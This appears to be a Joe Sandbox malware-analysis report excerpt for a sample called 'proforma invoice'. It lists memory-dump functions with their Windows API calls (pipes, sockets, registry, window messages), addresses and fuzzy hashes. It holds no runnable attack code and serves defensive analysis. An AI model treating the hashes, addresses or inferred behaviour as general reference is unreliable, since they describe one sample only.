                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                  • String ID:
                  • API String ID: 3761583154-0
                  • Opcode ID: 95863f4ef15ff580beab4bd7c8d3ad98e420d1cc7e01913dec614ff4fcf95fbd
                  • Instruction ID: e1ee94b5cd6d62ac54b22666b727b3544ad21a77defc5bfd6fe930f82ec2d9c3
                  • Opcode Fuzzy Hash: 95863f4ef15ff580beab4bd7c8d3ad98e420d1cc7e01913dec614ff4fcf95fbd
                  • Instruction Fuzzy Hash: 5F218376A04219BFDB10DFA8CC88CBB7BECEB097A47148065B915DB291DA70ED418764
                  Function 00B077FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B07842
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B07868
                  • SysAllocString.OLEAUT32(00000000), ref: 00B0786B
                  • SysAllocString.OLEAUT32 ref: 00B0788C
                  • SysFreeString.OLEAUT32 ref: 00B07895
                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00B078AF
                  • SysAllocString.OLEAUT32(?), ref: 00B078BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                  • String ID:
                  • API String ID: 3761583154-0
                  • Opcode ID: 6e6c112431d4f6429a6fec9fb67adf973affe8b2e8bf4a763f16b0b9a4174c11
                  • Instruction ID: d4cb4d906aebef2989e1bdbbbd14f62de7d0527941d9aeb639d8984c5e1e9735
                  • Opcode Fuzzy Hash: 6e6c112431d4f6429a6fec9fb67adf973affe8b2e8bf4a763f16b0b9a4174c11
                  • Instruction Fuzzy Hash: C9215132A04204BFDB109BE9DC8CDAABBECEB097607148165B915DB2E1DE74EC41CB64
                  Function 00B104D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                  Download Yara Rule
                  APIs
                  • GetStdHandle.KERNEL32(0000000C), ref: 00B104F2
                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B1052E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateHandlePipe
                  • String ID: nul
                  • API String ID: 1424370930-2873401336
                  • Opcode ID: 94516c7d4058a557f031af2dafe14861512c886bb1caf7d70e9c2cc70c6c301d
                  • Instruction ID: 28bbe475bfe018928c521f9be3ce876a7ba0b7cd50919df4fa4da1748b3a38e4
                  • Opcode Fuzzy Hash: 94516c7d4058a557f031af2dafe14861512c886bb1caf7d70e9c2cc70c6c301d
                  • Instruction Fuzzy Hash: FE218071510305ABDB20AF69DC84ADA7BF5EF54724F604A59F8A1E72E0D7B099D0CF20
                  Function 00B105A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                  Download Yara Rule
                  APIs
                  • GetStdHandle.KERNEL32(000000F6), ref: 00B105C6
                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B10601
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateHandlePipe
                  • String ID: nul
                  • API String ID: 1424370930-2873401336
                  • Opcode ID: 8974804eed330a16c4a027634ddadffe1c6ea33d77ec066de09d41cfac87aa62
                  • Instruction ID: acb0116e48c4b6fa42156901fd379b7a24542cb530fe3dad6c3393a755c437a4
                  • Opcode Fuzzy Hash: 8974804eed330a16c4a027634ddadffe1c6ea33d77ec066de09d41cfac87aa62
                  • Instruction Fuzzy Hash: 50219575510305ABDB20AF69DC44ADA77E4FF95720F600A59F8A1E72E0DBF098E0CB10
                  Function 00B340AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AA604C
                    • Part of subcall function 00AA600E: GetStockObject.GDI32(00000011), ref: 00AA6060
                    • Part of subcall function 00AA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA606A
                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B34112
                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B3411F
                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B3412A
                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B34139
                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B34145
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$CreateObjectStockWindow
                  • String ID: Msctls_Progress32
                  • API String ID: 1025951953-3636473452
                  • Opcode ID: 55e899c20be77a1795033164afee10e6954bd9579d8e61cb8b196d1bd202b491
                  • Instruction ID: bf5380878b7b8f66134577ee5030cb3c1583f8c7d5b68cc2d8e9cd5e7f8274e7
                  • Opcode Fuzzy Hash: 55e899c20be77a1795033164afee10e6954bd9579d8e61cb8b196d1bd202b491
                  • Instruction Fuzzy Hash: 2A11B2B2140219BEEF118F64CC86EE77FADEF08798F114111FA18A6090CB729C61DBA4
                  Function 00ADD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00ADD7A3: _free.LIBCMT ref: 00ADD7CC
                  • _free.LIBCMT ref: 00ADD82D
                    • Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
                    • Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0
                  • _free.LIBCMT ref: 00ADD838
                  • _free.LIBCMT ref: 00ADD843
                  • _free.LIBCMT ref: 00ADD897
                  • _free.LIBCMT ref: 00ADD8A2
                  • _free.LIBCMT ref: 00ADD8AD
                  • _free.LIBCMT ref: 00ADD8B8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                  • Instruction ID: 6cdbb734768161fba9956c197a71fd4a872b6a437e7ebc21e0cb0afb545d4a52
                  • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                  • Instruction Fuzzy Hash: 3B115E71540B04AAD621BFB0CE47FCB7BDCAF50700F400826B29FAA292DA65B6059760
                  Function 00B0DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B0DA74
                  • LoadStringW.USER32(00000000), ref: 00B0DA7B
                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B0DA91
                  • LoadStringW.USER32(00000000), ref: 00B0DA98
                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B0DADC
                  Strings
                  • %s (%d) : ==> %s: %s %s, xrefs: 00B0DAB9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: HandleLoadModuleString$Message
                  • String ID: %s (%d) : ==> %s: %s %s
                  • API String ID: 4072794657-3128320259
                  • Opcode ID: ecfeb51361ddf560d236dd99db0a42c5c2c0c3f1f55ad78048124850a3ef6c88
                  • Instruction ID: dd15663cbec18de05e87314898cfb7a2af0159120ca8b8f1f3faf029ffe4c9c3
                  • Opcode Fuzzy Hash: ecfeb51361ddf560d236dd99db0a42c5c2c0c3f1f55ad78048124850a3ef6c88
                  • Instruction Fuzzy Hash: BA014FF25002087BE7509BE09D89EEA3AACE708701F500495B706F3081EA749E844B74
                  Function 00B1096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                  Download Yara Rule
                  APIs
                  • InterlockedExchange.KERNEL32(014EE8D8,014EE8D8), ref: 00B1097B
                  • EnterCriticalSection.KERNEL32(014EE8B8,00000000), ref: 00B1098D
                  • TerminateThread.KERNEL32(00540050,000001F6), ref: 00B1099B
                  • WaitForSingleObject.KERNEL32(00540050,000003E8), ref: 00B109A9
                  • CloseHandle.KERNEL32(00540050), ref: 00B109B8
                  • InterlockedExchange.KERNEL32(014EE8D8,000001F6), ref: 00B109C8
                  • LeaveCriticalSection.KERNEL32(014EE8B8), ref: 00B109CF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                  • String ID:
                  • API String ID: 3495660284-0
                  • Opcode ID: 7a2622f824f68ba85b250c1ceec59c0d8c102958dd885c67a74d5c516ea66651
                  • Instruction ID: 18e4c394be1e0fc8fde32a8d461b1e2de032b5fccb07ea40e9f8c248817629e8
                  • Opcode Fuzzy Hash: 7a2622f824f68ba85b250c1ceec59c0d8c102958dd885c67a74d5c516ea66651
                  • Instruction Fuzzy Hash: 4FF0CD31442912BBD7515B94EE89ADA7A65FF05742FA01015F101A18A1CBB594B5CF90
                  Function 00AA5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                  Download Yara Rule
                  APIs
                  • GetClientRect.USER32(?,?), ref: 00AA5D30
                  • GetWindowRect.USER32(?,?), ref: 00AA5D71
                  • ScreenToClient.USER32(?,?), ref: 00AA5D99
                  • GetClientRect.USER32(?,?), ref: 00AA5ED7
                  • GetWindowRect.USER32(?,?), ref: 00AA5EF8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Rect$Client$Window$Screen
                  • String ID:
                  • API String ID: 1296646539-0
                  • Opcode ID: 4dd254c02e144ff957659de75f1157c32164c2495d5edd6e120af96818318f4f
                  • Instruction ID: 94c0df351809f63ef0ee5ec86818efcfb0f2e9963ab6eee85aec14946876219c
                  • Opcode Fuzzy Hash: 4dd254c02e144ff957659de75f1157c32164c2495d5edd6e120af96818318f4f
                  • Instruction Fuzzy Hash: E7B16A35A00A8ADBDB24CFB9C4407EEB7F5FF58310F14841AE8A9D7290DB34AA51DB54
                  Function 00AD01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                  Download Yara Rule
                  APIs
                  • __allrem.LIBCMT ref: 00AD00BA
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD00D6
                  • __allrem.LIBCMT ref: 00AD00ED
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD010B
                  • __allrem.LIBCMT ref: 00AD0122
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD0140
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                  • String ID:
                  • API String ID: 1992179935-0
                  • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                  • Instruction ID: bd662939c6e7712e4ea2a37fbdbf08403bbf1fa4b6f877b96852bb4175e907a1
                  • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                  • Instruction Fuzzy Hash: C681C172A00706AFE720AB69CD41F6A73A9EF41764F25462FF552DB781E770DA008B90
                  Function 00B21D10 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B23149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00B2101C,00000000,?,?,00000000), ref: 00B23195
                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00B21DC0
                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B21DE1
                  • WSAGetLastError.WSOCK32 ref: 00B21DF2
                  • inet_ntoa.WSOCK32(?), ref: 00B21E8C
                  • htons.WSOCK32(?,?,?,?,?), ref: 00B21EDB
                  • _strlen.LIBCMT ref: 00B21F35
                    • Part of subcall function 00B039E8: _strlen.LIBCMT ref: 00B039F2
                    • Part of subcall function 00AA6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,00ABCF58,?,?,?), ref: 00AA6DBA
                    • Part of subcall function 00AA6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00ABCF58,?,?,?), ref: 00AA6DED
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                  • String ID:
                  • API String ID: 1923757996-0
                  • Opcode ID: 4cf6c8513ae97f9ede276e7315c9a985ba24449d8bc7361b4b18019b6e7fe9fe
                  • Instruction ID: b7e83a696d095caa9028841c2a9221aa11dea869d7e4759e052a32ce1f1b89ba
                  • Opcode Fuzzy Hash: 4cf6c8513ae97f9ede276e7315c9a985ba24449d8bc7361b4b18019b6e7fe9fe
                  • Instruction Fuzzy Hash: D9A1E030504350AFC320DF28D995E6ABBE5EF95318F54899CF45A5B2E2CB31ED42CB92
                  Function 00AD61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00AC82D9,00AC82D9,?,?,?,00AD644F,00000001,00000001,8BE85006), ref: 00AD6258
                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00AD644F,00000001,00000001,8BE85006,?,?,?), ref: 00AD62DE
                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00AD63D8
                  • __freea.LIBCMT ref: 00AD63E5
                    • Part of subcall function 00AD3820: RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852
                  • __freea.LIBCMT ref: 00AD63EE
                  • __freea.LIBCMT ref: 00AD6413
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                  • String ID:
                  • API String ID: 1414292761-0
                  • Opcode ID: 19656727a0828baeaa3ad340023805f6300bf269d642ec3a76bb9f180e275322
                  • Instruction ID: b8ee12a38b308cf0ef38d70328c6ba615f2af519c33b3e9a9e74d24f71b43b4c
                  • Opcode Fuzzy Hash: 19656727a0828baeaa3ad340023805f6300bf269d642ec3a76bb9f180e275322
                  • Instruction Fuzzy Hash: 6C51E172A00216ABDF258F64DD81EAF7BA9EF44750F15462AFC06DB241DB34DC44D660
                  Function 00B2BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00B2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2B6AE,?,?), ref: 00B2C9B5
                    • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2C9F1
                    • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA68
                    • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA9E
                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2BCCA
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2BD25
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B2BD6A
                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B2BD99
                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B2BDF3
                  • RegCloseKey.ADVAPI32(?), ref: 00B2BDFF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                  • String ID:
                  • API String ID: 1120388591-0
                  • Opcode ID: c08b8a6259aac37bf3f89acfac8721b668cb0d3addfb6be66472941416916d45
                  • Instruction ID: 389cbb8c2f38ea90b726363996101915b6841db320dd75e2d1eeb17259a56302
                  • Opcode Fuzzy Hash: c08b8a6259aac37bf3f89acfac8721b668cb0d3addfb6be66472941416916d45
                  • Instruction Fuzzy Hash: AB81AC30208241AFC714DF24D881E6ABBE5FF85348F1489ACF5598B2A2DF31ED45CB92
                  Function 00AFF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VariantInit.OLEAUT32(00000035), ref: 00AFF7B9
                  • SysAllocString.OLEAUT32(00000001), ref: 00AFF860
                  • VariantCopy.OLEAUT32(00AFFA64,00000000), ref: 00AFF889
                  • VariantClear.OLEAUT32(00AFFA64), ref: 00AFF8AD
                  • VariantCopy.OLEAUT32(00AFFA64,00000000), ref: 00AFF8B1
                  • VariantClear.OLEAUT32(?), ref: 00AFF8BB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Variant$ClearCopy$AllocInitString
                  • String ID:
                  • API String ID: 3859894641-0
                  • Opcode ID: c5474fdb31a67ad531ed2ab5931777c9a762c51ad97aad423eb94d26de1e6fd8
                  • Instruction ID: ae4e7ae3c25b36fe126912d774ab89a0f604e288b82b96ee7876d628423349d1
                  • Opcode Fuzzy Hash: c5474fdb31a67ad531ed2ab5931777c9a762c51ad97aad423eb94d26de1e6fd8
                  • Instruction Fuzzy Hash: DF51B635500318BECF24ABE5D8D5B79B3A8EF45710B249467FA05DF292DBB08C40D7A6
                  Function 00B1910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA7620: _wcslen.LIBCMT ref: 00AA7625
                    • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                  • GetOpenFileNameW.COMDLG32(00000058), ref: 00B194E5
                  • _wcslen.LIBCMT ref: 00B19506
                  • _wcslen.LIBCMT ref: 00B1952D
                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00B19585
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
